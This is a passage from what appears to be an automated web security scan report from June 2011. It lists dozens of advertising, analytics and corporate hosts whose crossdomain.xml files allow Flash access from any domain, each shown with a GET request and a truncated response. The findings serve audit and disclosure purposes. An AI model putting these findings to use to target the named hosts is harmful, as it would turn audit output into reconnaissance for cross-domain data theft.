Content-Location: http://dar.youknowbest.com/crossdomain.xml
Last-Modified: Wed, 08 Dec 2010 17:37:14 GMT
Accept-Ranges: bytes
ETag: "01e78cfe96cb1:eb0"
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server: CO-ADSEDWEB01
X-Powered-By: ASP.NET
Date: Thu, 16 Jun 2011 15:52:12 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

4.32. http://dis.ny.us.criteo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dis.ny.us.criteo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: dis.ny.us.criteo.com

Response

HTTP/1.1 200 OK
Server: nginx
Cache-Control: max-age=31104000
Cache-Control: public
Content-Type: text/xml
Date: Thu, 16 Jun 2011 13:04:24 GMT
Expires: Sun, 10 Jun 2012 13:04:24 GMT
Accept-Ranges: bytes
Connection: close
Last-Modified: Wed, 19 Sep 2007 08:50:25 GMT
Content-Length: 360

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

4.33. http://ds.serving-sys.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ds.serving-sys.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
Date: Thu, 16 Jun 2011 15:52:11 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

4.34. http://ebay.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ebay.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ebay.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 17-Jun-2011 18:17:03 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Wed, 14-Sep-2011 18:17:03 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

4.35. http://external.ak.fbcdn.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Thu, 16 Jun 2011 11:26:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.36. http://fls.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Wed, 15 Jun 2011 20:44:28 GMT
Expires: Tue, 17 May 2011 18:17:24 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 52674
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.37. http://fw.adsafeprotected.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: fw.adsafeprotected.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"202-1304446860000"
Last-Modified: Tue, 03 May 2011 18:21:00 GMT
Content-Type: application/xml
Content-Length: 202
Date: Thu, 16 Jun 2011 13:13:09 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.38. http://homedepot.ugc.bazaarvoice.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://homedepot.ugc.bazaarvoice.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: homedepot.ugc.bazaarvoice.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml;charset=utf-8
Content-Language: en-US
Date: Thu, 16 Jun 2011 11:33:26 GMT
Content-Length: 230
Connection: close

<?xml version="1.0" encoding="UTF-8"?><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"/><allow-access-from domain="*"/><allow-http-request-headers-from domain="*" heade
...[SNIP]...

4.39. http://i1.sndcdn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://i1.sndcdn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: i1.sndcdn.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 16 Sep 2010 08:24:21 GMT
ETag: "da542030ecb4a258735bde178e216d8f"
Content-Type: text/xml
Date: Thu, 16 Jun 2011 19:27:38 GMT
Content-Length: 265
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitt
...[SNIP]...

4.40. http://ib.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 17-Jun-2011 11:29:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Wed, 14-Sep-2011 11:29:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

4.41. http://ic.nexac.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ic.nexac.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ic.nexac.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 11 May 2011 18:34:52 GMT
Accept-Ranges: bytes
ETag: "e02dbd1da10cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 16 Jun 2011 14:22:26 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.42. http://idcs.interclick.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 11 May 2011 18:34:52 GMT
Accept-Ranges: bytes
ETag: "e02dbd1da10cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 16 Jun 2011 11:32:16 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.43. http://img.mediaplex.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:07:51 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1b1f-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.44. http://impl.ackak.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://impl.ackak.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: impl.ackak.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "9c413-14a-499881e7db740"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Content-Type: application/xml
Age: 10015
Date: Thu, 16 Jun 2011 19:09:05 GMT
Last-Modified: Tue, 11 Jan 2011 01:36:53 GMT
Expires: Fri, 17 Jun 2011 16:22:10 GMT
Content-Length: 330
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-po
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

4.45. http://js.revsci.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Thu, 16 Jun 2011 11:22:20 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.46. http://l2.betrad.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://l2.betrad.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: l2.betrad.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=315360000, public
Content-Type: application/xml
Date: Thu, 16 Jun 2011 14:39:51 GMT
ETag: "4ded3537=cf"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Last-Modified: Mon, 06 Jun 2011 20:14:47 GMT
Server: Cherokee
Content-Length: 207
Connection: Close

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-p
...[SNIP]...

4.47. http://log30.doubleverify.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://log30.doubleverify.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 16 Jun 2011 18:34:06 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.48. http://media2.legacy.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media2.legacy.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: media2.legacy.com

Response

4.49. http://metrics.citibank.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.citibank.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.citibank.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:38 GMT
Server: Omniture DC/2.0.0
xserver: www1
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.50. http://oimg.nbcuni.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oimg.nbcuni.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: oimg.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:26:25 GMT
Server: Omniture DC/2.0.0
xserver: www324
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.51. http://om.dowjoneson.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://om.dowjoneson.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: om.dowjoneson.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:22:22 GMT
Server: Omniture DC/2.0.0
xserver: www434
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.52. http://p.addthis.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://p.addthis.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: p.addthis.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 16 Jun 2011 12:52:40 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.53. http://pbid.pro-market.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pbid.pro-market.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pbid.pro-market.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: app4.ny
ETag: W/"207-1299672386000"
Last-Modified: Wed, 09 Mar 2011 12:06:26 GMT
Content-Type: application/xml
Content-Length: 207
Date: Thu, 16 Jun 2011 13:09:59 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.54. http://pix04.revsci.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Thu, 16 Jun 2011 11:22:21 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.55. http://pixel.adsafeprotected.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.adsafeprotected.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.adsafeprotected.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"202-1304446860000"
Last-Modified: Tue, 03 May 2011 18:21:00 GMT
Content-Type: application/xml
Content-Length: 202
Date: Thu, 16 Jun 2011 13:08:05 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.56. http://pixel.everesttech.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.everesttech.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.everesttech.net

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:11:49 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "280802d-cb-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 203
Keep-Alive: timeout=15, max=999608
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.57. http://pixel.invitemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 16 Jun 2011 12:08:09 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.58. http://pixel.quantserve.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Fri, 17 Jun 2011 11:26:36 GMT
Content-Type: text/xml
Content-Length: 207
Date: Thu, 16 Jun 2011 11:26:36 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.59. http://puma.vizu.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://puma.vizu.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: puma.vizu.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:52:14 GMT
Server: PWS/1.7.2.3
X-Px: ht iad-agg-n12.panthercdn.com
ETag: "9c515-10d-8b2eaf40"
P3P: CP="DSP NID OTP UNR STP NON", policyref="/w3c/p3p.xml"
Cache-Control: max-age=604800
Expires: Sun, 19 Jun 2011 22:05:56 GMT
Age: 323178
Content-Length: 269
Content-Type: text/xml
Last-Modified: Thu, 09 Jun 2011 20:46:13 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-
...[SNIP]...

4.60. http://r.turn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Thu, 16 Jun 2011 11:28:43 GMT
Content-Type: text/xml;charset=UTF-8
Date: Thu, 16 Jun 2011 11:28:42 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

4.61. http://radiumone.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://radiumone.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: radiumone.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:26:30 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 27 Mar 2011 09:31:58 GMT
ETag: "7371fd4-c7-7f9e9f80"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.62. http://reviews.homedepot.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://reviews.homedepot.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: reviews.homedepot.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml;charset=utf-8
Content-Language: en-US
Date: Thu, 16 Jun 2011 11:33:22 GMT
Content-Length: 230
Connection: close

<?xml version="1.0" encoding="UTF-8"?><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"/><allow-access-from domain="*"/><allow-http-request-headers-from domain="*" heade
...[SNIP]...

4.63. http://rmd.atdmt.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rmd.atdmt.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rmd.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Expires: Thu, 23 Jun 2011 10:07:19 GMT
Date: Thu, 16 Jun 2011 15:31:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.64. http://rp.gwallet.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rp.gwallet.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rp.gwallet.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Server: radiumone/1.2
Content-type: text/xml; charset=UTF-8
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-
...[SNIP]...

4.65. http://rs.gwallet.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rs.gwallet.com

Response

4.66. http://secure-us.imrworldwide.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:22:21 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Thu, 23 Jun 2011 11:22:21 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

4.67. http://segment-pixel.invitemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 16 Jun 2011 12:52:41 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.68. http://spe.atdmt.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://spe.atdmt.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Expires: Tue, 21 Jun 2011 03:17:27 GMT
Date: Thu, 16 Jun 2011 15:31:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.69. http://sync.mathtag.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x5 pid 0x2216 8726
Set-Cookie: ts=1308226099; domain=.mathtag.com; path=/; expires=Fri, 15-Jun-2012 12:08:19 GMT
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

4.70. http://t.mookie1.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://t.mookie1.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: t.mookie1.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 14:08:59 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 12 Apr 2011 21:52:25 GMT
ETag: "6930037-c9-4a0bfb522d840"
Accept-Ranges: bytes
Content-Length: 201
Keep-Alive: timeout=300, max=22
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.71. http://tags.bluekai.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Thu, 16 Jun 2011 12:51:24 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 14 Jun 2011 21:58:43 GMT
ETag: "29a81b4-ca-4a5b323ab4ac0"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

4.72. http://tf.nexac.com/crossdomain.xml previous next

Summary
